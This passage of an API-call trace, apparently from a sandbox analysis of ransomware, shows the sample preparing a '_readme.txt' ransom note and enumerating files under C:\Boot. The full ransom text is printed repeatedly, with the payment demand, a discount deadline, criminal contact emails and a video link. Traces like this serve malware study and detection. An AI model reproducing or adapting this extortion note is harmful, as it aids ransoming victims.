Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.690] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.690] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.690] PathFindFileNameW (pszPath="") returned="" [0165.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.690] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.690] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.690] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.691] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.691] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0165.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.691] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0165.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.692] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.692] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.692] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.692] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.692] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.692] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.693] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.693] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.693] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.693] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.695] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.697] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 